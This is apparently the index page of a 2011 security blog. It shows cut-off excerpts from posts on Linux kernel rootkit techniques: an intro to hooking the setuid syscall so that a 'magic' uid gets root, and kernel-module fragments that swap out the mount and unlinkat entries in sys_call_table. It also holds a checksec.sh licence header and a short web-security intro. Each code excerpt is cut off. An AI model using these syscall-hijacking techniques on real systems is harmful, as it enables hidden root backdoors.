Aug 18, 2011

Introduction

    Since the late nineties, the Internet has grown at an exponential rate. One of the biggest growth spurts came between 1995 and 2000, when the dot-com bubble spawned e-commerce for virtually every facet of society. The success of the Internet has brought great change to the world as we know it; however, not all of this growth has been productive. With thousands of sites launching daily and limited resources available to monitor the credibility and/or security of these sites, the existence of vulnerabilities was inevitable.

Aug 16, 2011

Gandalf Kernel Checking

#!/bin/bash
#
# The BSD License (http://www.opensource.org/licenses/bsd-license.php)
# specifies the terms and conditions of use for checksec.sh:
#
# Copyright (c) 2009-2010, Tobias Klein.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#

Mar 23, 2011

Kernel Mode Testing Plan

--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use,
    which we can use to hook system calls in kernel mode. I will deal only
    with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
    hook the setuid system call so that, when it is given a "magic" uid as
    an argument, it gives root to the calling process.


Mar 21, 2011

Credintealist

int init_module(void)
{
    disable_page_protection();
    ori_mount=sys_call_table[__NR_mount];
    sys_call_table[__NR_mount]=hack_mount;
    enable_page_protection();
    return 

Mar 16, 2011

Redemption

#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;

asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);

asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{